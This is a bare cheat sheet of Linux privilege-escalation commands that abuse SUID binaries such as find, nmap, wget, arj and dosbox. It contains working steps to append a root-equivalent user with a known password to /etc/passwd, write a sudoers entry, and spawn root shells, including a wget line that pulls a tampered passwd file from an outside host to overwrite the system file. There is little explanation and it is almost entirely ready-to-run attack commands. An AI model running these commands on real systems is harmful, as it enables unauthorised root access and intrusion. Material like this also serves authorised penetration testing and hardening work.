find / -perm -u=s -type f 2>/dev/null
$ dosbox -c 'mount c /etc' -c 'echo test ALL=(ALL) ALL >> C:\sudoers' -c exit
find . -exec /bin/sh -p \; -quit
$ openssl passwd -1 -salt ignite pass123
$1$ignite$3eTbJm98O9Hz.k1NTdNxe1
$ mkdir /tmp/privesc && cd /tmp/privesc
$ cp /etc/passwd .
$ cp passwd passwd.bak
$ echo "ch:\$1\$ignite\$3eTbJm98O9Hz.k1NTdNxe1:0:0:root:/root:/bin/bash" >> ./passwd
$ cp ./passwd /etc/passwd
$ su ch
password: pass123
# Restoring the original
$ cp /tmp/privesc/passwd /etc/passwd && rm -rf /tmp/privesc
$ nmap --interactive
nmap> !sh
-----------------------
$ TF=$(mktemp)
$ echo 'os.execute("/bin/bash")' > $TF
$ nmap --script=$TF
-----------------------
$ echo 'os.execute("/bin/sh")' > /tmp/x.nse
$ nmap --script /tmp/x.nse
$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/wget
Copy contents of /etc/passwd to your host as passwd.
echo "ch:\$1\$ignite\$3eTbJm98O9Hz.k1NTdNxe1:0:0:root:/root:/bin/bash" >> passwd
$ wget http://192.168.49.60/passwd -O /etc/passwd
$ su ch
password:pass123
$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/arj
$ cd /tmp
$ cp /etc/passwd passwd
$ echo "ch:\$1\$ignite\$3eTbJm98O9Hz.k1NTdNxe1:0:0:root:/root:/bin/bash" >> passwd
$ arj a priv passwd
$ arj x priv.arj /etc/
→ Yes
$su ch
Password: pass123
